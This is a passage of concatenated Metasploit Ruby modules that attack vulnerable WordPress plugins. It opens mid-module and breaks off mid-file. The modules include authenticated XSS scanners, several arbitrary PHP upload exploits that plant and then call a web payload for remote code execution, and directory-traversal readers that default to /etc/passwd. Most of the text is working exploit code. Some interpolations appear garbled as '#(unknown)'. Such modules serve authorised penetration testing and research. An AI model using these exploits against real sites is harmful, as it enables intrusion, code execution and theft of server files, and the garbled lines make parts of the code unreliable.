          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8127'],
          ['URL', 'https://packetstormsecurity.com/files/132907/']
        ],
      'DisclosureDate' => 'Aug 04 2015'
    ))

    register_options(
      [
        OptString.new('WP_USER', [true, 'A valid username', nil]),
        OptString.new('WP_PASS', [true, 'A valid password', nil])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('database-sync', '0.5')
  end

  def user
    datastore['WP_USER']
  end

  def password
    datastore['WP_PASS']
  end

  def run_host(ip)
    vprint_status("#{peer} - Trying to login as: #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as: #{user}")
      return
    end

    # Generic reflected-XSS probe carrying a random marker (the specific payload
    # string is not preserved in this copy of the module)
    marker = Rex::Text.rand_text_numeric(8)
    xss = "<script>alert(#{marker})</script>"

    res = send_request_cgi(
      'uri' => normalize_uri(wordpress_url_backend, 'tools.php'),
      'vars_get' => {
        'page' => 'dbs_options',
        'dbs_action' => 'sync',
        'url' => xss
      },
      'cookie' => cookie
    )

    unless res && res.body
      print_error("#{peer} - Server did not respond in an expected way")
      return
    end

    # Vulnerable only if the probe is reflected unescaped
    if res.code == 200 && res.body.include?(xss)
      print_good("#{peer} - Vulnerable to Cross-Site Scripting: Database Sync 0.4 plugin for WordPress")
      p = store_local(
        'wp_databasesync.http',
        'text/html',
        res.body,
        "wp_databasesync_xss_#{marker}.html"
      )
      print_good("Saved in: #{p}")
    else
      print_error("#{peer} - Failed, maybe the target isn't vulnerable.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_business_intelligence_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Business Intelligence Lite File Upload',
      'Description'    => %q{
        The WordPress Business Intelligence Lite plugin contains an arbitrary file upload
        vulnerability. Because the plugin uses its own upload handler (the bundled
        open-flash-chart ofc_upload_image.php) instead of the WordPress API, the file type
        is not restricted and arbitrary files can be written to the upload folder.
      },
      'Author'         =>
        [
          'Manish Kishan Tanwar', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '7200'],
          ['URL', 'http://packetstormsecurity.com/files/125927/']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WP Business Intelligence Lite 1.0.6', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 31 2014')) # Secunia?
  end

  def check
    check_plugin_version_from_readme('wp-business-intelligence-lite', '1.1')
  end

  def exploit
    filename = "#{rand_text_alpha_lower(6)}.php"

    # ofc_upload_image.php writes the raw POST body to tmp-upload-images/<name>
    print_status("#{peer} - Uploading payload as #{filename}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'resources', 'open-flash-chart', 'php-ofc-library', 'ofc_upload_image.php'),
      'ctype' => 'text/plain',
      'vars_get' => {
        'name' => filename
      },
      'data' => payload.encoded
    )

    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'resources', 'open-flash-chart', 'tmp-upload-images', filename) },
      5
    )
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/scanner/http/wp_visual_form_builder_xss_scanner.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Visual Form Builder Plugin XSS Scanner',
      'Description'    => %q{
        This module attempts to exploit an authenticated cross-site scripting vulnerability
        in the Visual Form Builder plugin for WordPress, version 2.8.2 and likely prior, in
        order to determine whether the instance is vulnerable.
      },
      'Author'         =>
        [
          'Tim Coen', # Vulnerability Discovery
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '7991'],
          ['URL', 'http://software-talk.org/blog/2015/05/sql-injection-reflected-xss-visual-form-builder-wordpress-plugin/']
        ],
      'DisclosureDate' => 'May 15 2015'
    ))

    register_options(
      [
        OptString.new('WP_USER', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class)
  end

  def check
    check_plugin_version_from_readme('visual-form-builder', '2.8.3')
  end

  def user
    datastore['WP_USER']
  end

  def password
    datastore['WP_PASSWORD']
  end

  def run_host(ip)
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
    print_good("#{peer} - Login successful")

    # Random marker wrapped in a generic tag-breaking probe (the specific payload
    # string is not preserved in this copy of the module)
    xss = Rex::Text.rand_text_numeric(8)
    xss_payload = "\"><script>alert(#{xss})</script>"

    res = send_request_cgi(
      'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'visual-form-builder',
        's' => xss_payload
      },
      'cookie' => cookie
    )

    unless res && res.body
      print_error("#{peer} - Server did not respond in an expected way")
      return
    end

    # Matching the bare marker would also fire on an HTML-escaped echo of the
    # search term, so require the whole probe to come back unescaped
    if res.code == 200 && res.body.include?(xss_payload)
      print_good("#{peer} - Vulnerable to Cross-Site Scripting: \"Visual Form Builder 2.8.2\" plugin for WordPress")
      p = store_local('wp_visualform.http', 'text/html', res.body, "wp_visualform_xss_#{xss}.html")
      print_good("Saved in: #{p}")
    else
      print_error("#{peer} - Failed, maybe the target isn't vulnerable.")
    end
  end
end
--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_ultimate_product_catalogue_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Ultimate Product Catalogue Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress Ultimate Product Catalogue
        plugin, version 3.1.1. The vulnerability allows for arbitrary file upload and remote code execution.
20 | }, 21 | 'Author' => 22 | [ 23 | 'Luca Ercoli', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['OSVDB', '121164'], 30 | ['WPVDB', '7939'], 31 | ['URL', 'http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability/'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['WP Ultimate Product Caatalogue 3.1.1', {}]], 37 | 'DisclosureDate' => 'Apr 22 2015', 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('ultimate-product-catalogue', '3.1.2') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Products_Spreadsheet\"; filename=\"#{php_pagename}\"") 51 | post_data = data.to_s 52 | 53 | res = send_request_cgi( 54 | 'uri' => wordpress_url_admin_ajax, 55 | 'method' => 'POST', 56 | 'vars_get' => { 57 | 'action' => 'widgets_init', 58 | 'Action' => 'UPCP_AddProductSpreadsheet' 59 | }, 60 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 61 | 'data' => post_data 62 | ) 63 | 64 | if res 65 | if res.code == 200 && res.body =~ /0/ 66 | print_good("#{peer} - Our payload is at: #{php_pagename}.") 67 | register_files_for_cleanup(php_pagename) 68 | else 69 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 70 | end 71 | else 72 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 73 | end 74 | 75 | print_status("#{peer} - Calling payload...") 76 | send_request_cgi( 77 | { 'uri' => normalize_uri(wordpress_url_plugins, 'ultimate-product-catalogue', 'product-sheets', php_pagename) }, 78 | 5 79 | ) 80 | end 81 | end 82 | -------------------------------------------------------------------------------- 
/modules/exploits/unix/webapp/wp_xerteonline_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Xerte Online Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Xerte Online 19 | plugin, version 0.32. The vulnerability allows for arbitrary file upload 20 | and remote code execution. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Sammy', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['WPVDB', '6102'], 31 | ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-xerte-online-arbitrary-file-upload-vulnerability.html'], 32 | ['URL', 'http://packetstormsecurity.com/files/119220/'] 33 | ], 34 | 'Privileged' => false, 35 | 'Platform' => 'php', 36 | 'Arch' => ARCH_PHP, 37 | 'Targets' => [['Xerte Online 0.32', {}]], 38 | 'DisclosureDate' => 'Dec 30 2012', 39 | 'DefaultTarget' => 0) 40 | ) 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('xerte-online', '0.36') 45 | end 46 | 47 | def exploit 48 | php_pagename = rand_text_alpha(4 + rand(4)) + '.php' 49 | 50 | data = Rex::MIME::Message.new 51 | data.add_part("/wp-content/plugins/xerte-online/xertefiles/#{php_pagename}", nil, nil, 'form-data; name="filename"') 52 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"filedata\"") 53 | post_data = data.to_s 54 | 55 | res = send_request_cgi( 56 | 'uri' => 
normalize_uri(wordpress_url_plugins, 'xerte-online', 'xertefiles', 'save.php'), 57 | 'method' => 'POST', 58 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 59 | 'data' => post_data 60 | ) 61 | 62 | if res 63 | if res.code == 200 && res.body.include?('file has been corrupted') 64 | print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") 65 | register_files_for_cleanup(php_pagename) 66 | else 67 | fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") 68 | end 69 | else 70 | fail_with(Failure::Unknown,'ERROR') 71 | end 72 | 73 | print_status("#{peer} - Calling payload...") 74 | send_request_cgi( 75 | { 'uri' => normalize_uri(wordpress_url_plugins, 'xerte-online', 'xertefiles', php_pagename) }, 76 | 5 77 | ) 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_font_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Font File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an authenticated directory traversal 19 | vulnerability in WordPress Plugin "Font" version 7.4, 20 | allowing to read arbitrary files with the web server privileges. 
21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8214'], 25 | ['CVE', '2015-7683'], 26 | ['PACKETSTORM', '133930'] 27 | ], 28 | 'Author' => 29 | [ 30 | 'David Moore', # Vulnerability Discovery 31 | 'Roberto Soares Espreto ' # Metasploit Module 32 | ], 33 | 'License' => MSF_LICENSE 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptString.new('WP_USERNAME', [true, 'A valid username', nil]), 39 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]), 40 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']) 41 | ], self.class) 42 | end 43 | 44 | def user 45 | datastore['WP_USERNAME'] 46 | end 47 | 48 | def password 49 | datastore['WP_PASSWORD'] 50 | end 51 | 52 | def check 53 | check_plugin_version_from_readme('font', '7.5.1') 54 | end 55 | 56 | def run_host(ip) 57 | vprint_status("#{peer} - Trying to login as: #{user}") 58 | cookie = wordpress_login(user, password) 59 | fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{user}") if cookie.nil? 60 | 61 | filename = datastore['FILEPATH'] 62 | filename = filename[1, filename.length] if filename =~ %r{/^///} 63 | 64 | res = send_request_cgi( 65 | 'method' => 'POST', 66 | 'uri' => normalize_uri(wordpress_url_plugins, 'font', 'AjaxProxy.php'), 67 | 'vars_post' => { 68 | 'url' => "#(unknown)", 69 | 'data[version]' => 7.4, 70 | 'format' => 'json', 71 | 'action' => 'cross_domain_request' 72 | }, 73 | 'cookie' => cookie 74 | ) 75 | 76 | if res && res.code == 200 && res.body.length > 0 77 | vprint_line("#{res.body}") 78 | fname = datastore['FILEPATH'] 79 | 80 | path = store_loot( 81 | 'font.traversal', 82 | 'text/plain', 83 | ip, 84 | res.body, 85 | fname 86 | ) 87 | 88 | print_good("#{peer} - File saved in: #{path}") 89 | else 90 | print_error("#{peer} - Nothing was downloaded. 
You can try to change the FILEPATH.") 91 | end 92 | end 93 | 94 | end 95 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_worktheflow_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Work The Flow Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin, 19 | version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Claudio Viviani', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['WPVDB', '7883'], 30 | ['EDB', '36640'], 31 | ['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['Work The Flow 2.5.2', {}]], 37 | 'DisclosureDate' => 'Mar 14 2015', 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.2') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part('upload', nil, nil, 'form-data; name="action"') 51 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"") 52 | 
post_data = data.to_s 53 | 54 | res = send_request_cgi({ 55 | 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 56 | 'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'), 57 | 'method' => 'POST', 58 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 59 | 'data' => post_data 60 | }) 61 | 62 | if res 63 | if res.code == 200 64 | print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") 65 | register_files_for_cleanup(php_pagename) 66 | else 67 | fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}") 68 | end 69 | else 70 | fail_with('ERROR') 71 | end 72 | 73 | print_status("#{peer} - Calling payload...") 74 | send_request_cgi( 75 | 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 76 | 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) 77 | ) 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Reflex Gallery Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery 19 | version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution. 
20 | }, 21 | 'Author' => 22 | [ 23 | 'Unknown', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['EDB', '36374'], 30 | ['OSVDB', '88853'], 31 | ['WPVDB', '7867'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['Reflex Gallery 3.1.3', {}]], 37 | 'DisclosureDate' => 'Dec 30 2012', # OSVDB? EDB? WPVDB? Cannot set the date. 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('reflex-gallery', '3.1.4') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"") 51 | post_data = data.to_s 52 | 53 | time = Time.new 54 | year = time.year.to_s 55 | month = "%02d" % time.month 56 | 57 | res = send_request_cgi({ 58 | 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'), 59 | 'method' => 'POST', 60 | 'vars_get' => { 61 | 'Year' => "#{year}", 62 | 'Month' => "#{month}" 63 | }, 64 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 65 | 'data' => post_data 66 | }) 67 | 68 | if res 69 | if res.code == 200 && res.body =~ /success|#{php_pagename}/ 70 | print_good("#{peer} - Our payload is at: #{php_pagename}. 
Calling payload...") 71 | register_files_for_cleanup(php_pagename) 72 | else 73 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 74 | end 75 | else 76 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 77 | end 78 | 79 | print_status("#{peer} - Calling payload...") 80 | send_request_cgi( 81 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) 82 | ) 83 | end 84 | end 85 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress N-Media Website Contact Form Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form 19 | plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution. 
20 | }, 21 | 'Author' => 22 | [ 23 | 'Claudio Viviani', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'], 30 | ['WPVDB', '7896'] 31 | ], 32 | 'Privileged' => false, 33 | 'Platform' => 'php', 34 | 'Arch' => ARCH_PHP, 35 | 'Targets' => [['N-Media WebSite Contact Form 1.3.4', {}]], 36 | 'DisclosureDate' => 'Apr 12 2015', 37 | 'DefaultTarget' => 0) 38 | ) 39 | end 40 | 41 | def check 42 | check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5') 43 | end 44 | 45 | def exploit 46 | php_pagename = rand_text_alpha(4 + rand(4)) + '.php' 47 | 48 | data = Rex::MIME::Message.new 49 | data.add_part('upload', nil, nil, 'form-data; name="action"') 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"") 51 | data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"') 52 | post_data = data.to_s 53 | 54 | res = send_request_cgi({ 55 | 'uri' => wordpress_url_admin_ajax, 56 | 'method' => 'POST', 57 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 58 | 'data' => post_data 59 | }) 60 | 61 | if res 62 | if res.code == 200 && res.body =~ /filename/ 63 | begin 64 | new_php_pagename = JSON.parse(res.body)["filename"] 65 | rescue JSON::ParserError 66 | new_php_pagename = '' 67 | end 68 | print_good("#{peer} - Our payload is at: #{new_php_pagename}. 
Calling payload...") 69 | register_files_for_cleanup(new_php_pagename) 70 | else 71 | fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}") 72 | end 73 | else 74 | fail_with('ERROR') 75 | end 76 | 77 | print_status("#{peer} - Calling payload...") 78 | send_request_cgi( 79 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) 80 | ) 81 | end 82 | end 83 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_acf_frontend_display_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress ACF FrontEnd Display Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress ACF 19 | FrontEnd Display version 2.0.5. The vulnerability allows for arbitrary 20 | file upload and remote code execution. 
21 | }, 22 | 'Author' => 23 | [ 24 | 'TUNISIAN CYBER', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['EDB', '37514'], 31 | ['WPVDB', '7867'], 32 | ['URL', 'http://packetstormsecurity.com/files/132590/'], 33 | ['URL', 'http://www.antihackers.ro/blog/wordpress-acf-frontend-display-plugin-2-0-5-file-upload-vulnerability/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['ACF FrontEnd Display 2.0.5', {}]], 39 | 'DisclosureDate' => 'Jul 03 2015', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | check_plugin_version_from_readme('acf-frontend-display') 46 | end 47 | 48 | def exploit 49 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 50 | 51 | data = Rex::MIME::Message.new 52 | data.add_part('upload', nil, nil, 'form-data; name="action"') 53 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"") 54 | post_data = data.to_s 55 | 56 | time = Time.new 57 | year = time.year.to_s 58 | 59 | res = send_request_cgi( 60 | 'uri' => normalize_uri(wordpress_url_plugins, 'acf-frontend-display', 'js', 'blueimp-jQuery-File-Upload-d45deb1', 'server', 'php', 'index.php'), 61 | 'method' => 'POST', 62 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 63 | 'data' => post_data 64 | ) 65 | 66 | if res 67 | if res.code == 200 && res.body.include?("#{php_pagename}") 68 | vprint_good("#{peer} - Our payload is at: #{php_pagename}. 
Calling payload...") 69 | register_files_for_cleanup(php_pagename) 70 | else 71 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 72 | end 73 | else 74 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 75 | end 76 | 77 | print_status("#{peer} - Calling payload...") 78 | send_request_cgi( 79 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "uigen_#{year}", php_pagename) 80 | ) 81 | end 82 | end 83 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_elisqlreports_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress EZ SQL Reports File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a authenticated directory traversal vulnerability 19 | in WordPress Plugin "EZ SQL Reports" version 4.11.33, allowing 20 | to read arbitrary files with the web server privileges. 
21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8184'], 25 | ['EDB', '38176'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Felipe Molina', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('WP_USER', [true, 'A valid username', nil]), 38 | OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]), 39 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 40 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the wordpress root folder)', 7 ]) 41 | ], self.class) 42 | end 43 | 44 | def user 45 | datastore['WP_USER'] 46 | end 47 | 48 | def password 49 | datastore['WP_PASS'] 50 | end 51 | 52 | def check 53 | check_plugin_version_from_readme('elisqlreports', '4.11.37') 54 | end 55 | 56 | def run_host(ip) 57 | vprint_status("#{peer} - Trying to login as: #{user}") 58 | cookie = wordpress_login(user, password) 59 | if cookie.nil? 60 | print_error("#{peer} - Unable to login as: #{user}") 61 | return 62 | end 63 | 64 | traversal = '../' * datastore['DEPTH'] 65 | filename = datastore['FILEPATH'] 66 | filename = filename[1, filename.length] if filename =~ /^\// 67 | 68 | res = send_request_cgi( 69 | 'method' => 'GET', 70 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 71 | 'vars_get' => { 72 | 'page' => 'ELISQLREPORTS-settings', 73 | 'Download_SQL_Backup' => "#{traversal}#(unknown)" 74 | }, 75 | 'cookie' => cookie 76 | ) 77 | 78 | if res && res.code == 200 && !res.body.include?('SQL Reports - Plugin Settings') 79 | 80 | vprint_line("\n#{res.body}") 81 | fname = datastore['FILEPATH'] 82 | path = store_loot( 83 | 'elisqlreports.traversal', 84 | 'text/plain', 85 | ip, 86 | res.body, 87 | fname 88 | ) 89 | print_good("#{peer} - File saved in: #{path}") 90 | else 91 | print_error("#{peer} - Nothing was downloaded. 
